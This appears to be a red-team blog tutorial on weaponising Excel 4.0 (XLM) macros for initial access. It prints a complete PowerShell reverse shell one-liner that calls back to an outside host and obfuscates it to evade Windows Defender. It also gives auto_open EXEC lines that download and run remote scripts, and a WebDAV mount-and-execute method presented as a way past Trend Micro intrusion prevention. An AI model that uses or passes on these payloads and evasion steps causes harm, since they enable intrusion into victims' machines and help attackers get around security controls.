image

XLM (macro 4.0 ) considered as great technique for red team operations , since XLM is difficult to analysis and make it hard for anti virus solutions to detect it, while most of anti-virus engines will detect VBA .

it seems easy to bypass basic anti virus,but it is difficult to beat enterprise solutions which comes with (HIPS) techniques to detect even commands being passed by XLM 4.0 macro , and immediately will rise an alert in case any malicious commands being executed , or malicious traffic being sent from trusted software .

initial access with XLM

let's start preparing our payload with XLM macro 4.0

  • right click on selected sheet and click on insert dialog
  • choose excel 4.0 macro
  • type some basic commands to be executed
=exec("calc.exe")
  • rename cell title from A1 into auto_open that's will allow command to be executed when opening the document

weaponization of XLM

let's make our feet wet ,and instead of executing a calc.exe , will use powershell payload to get a reverse shell . to avoid detection scenario by any basic anti-virus solution we have to obfuscate a known powershell reverse shell one liner

$client = New-Object System.Net.Sockets.TCPClient('lab.0xsp.com',444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

i am going to use invoke-obfuscate powershell script , Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator. to install the script ,git clone the repo into your working folder and execute following commands through PS

Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation

beat windows defender

first off , let's load invoke-obfuscate psd module and save the content of our powershell script into file c:\tmp\poc.txt then set the working path inside obfuscator framework into targeted folder

set scriptpath c:\tmp\poc.txt

drawing from obfuscator script , chooseToken with ALL option Great ! , we have successfully beaten windows defender , let's move on into next level !

migrate payload with XLM

to do that , we have to use invoke-expression cmdlet to download and execute obfuscated powershell reverse shell

powershell -c IEX (New-Object Net.WebClient).DownloadString('https://lab.0xsp.com/obf.txt')

let's also insert that command into XLM macro 4.0 execute function and try to execute it

=exec("powershell -c IEX (New-Object Net.WebClient).DownloadString('https://lab.0xsp.com/obf.txt')")

drawing

drawing Unfortunately , it has been detected by **Trendmicro IPS** .so we have to find a way to bypass Trendmicro intrusion prevention system

bypass trendmicro intrusion prevention system

Intrusion Prevention rules can intercept traffic that is trying to exploit the vulnerability. It identifies malicious software that is accessing the network and it increases visibility into, or control over, applications that are accessing the network. Therefore your computers are protected until patches that fix the vulnerability are released, tested, and deployed.

https://help.deepsecurity.trendmicro.com/intrusion-prevention.html

trendmicro detected every malicious command, so first i have to understand which modules that's being detected , so i made a simple list as below

  • iex or download functions with powershell
  • usage of certutil to download or encode , decode files
  • usage of any powershell commands responsible for fetching content .

so as i see , trendmicro is able to detect every kind of fetching remote content from Macro or VBA code . later i have observed that less of arguments you pass through macro , the more you able to bypass it, but how you will do that to get a reverse shell with less commands ! and without usage of any download functions ? that's really challenging , but nothing is impossible . as an idea comes into my mind to use webdav shares to execute hosted script or binary . by mounting a remote drive then execute script directly from mounted drive . so the attack will be tricky and i think i will be able to bypass . let's start doing it then

installation and configuring webdav

sudo apt-get update
sudo apt-get install apache2
sudo mkdir /var/www/webdav
sudo chown -R www-data:www-data /var/www/

then you have to enable webdav modules

sudo a2enmod dav
sudo a2enmod dav_fs

and forsure you have to made some modification on virtual host section

Alias /webdav /var/www/webdav 
<Directory /var/www/webdav> 
DAV On 
</Directory>

note : you don't need to enable authentication for webdav , or the attack will not work as expected because code length limitation on xml inline code

Releasing the monster out of cage

drawing

attack scenario

  • mounting remote webdav share .
  • executing powershell ps1 with bypass execution flag .
=EXEC("cmd /k net use z: \\lab.0xsp.com\webdav&powershell -exec bypass -f \\lab.0xsp.com\webdav\ba.ps1")

after adding the previous code into our XLM , you will see that new drive with Z char has been mounted , and execution of reverse shell is received successfully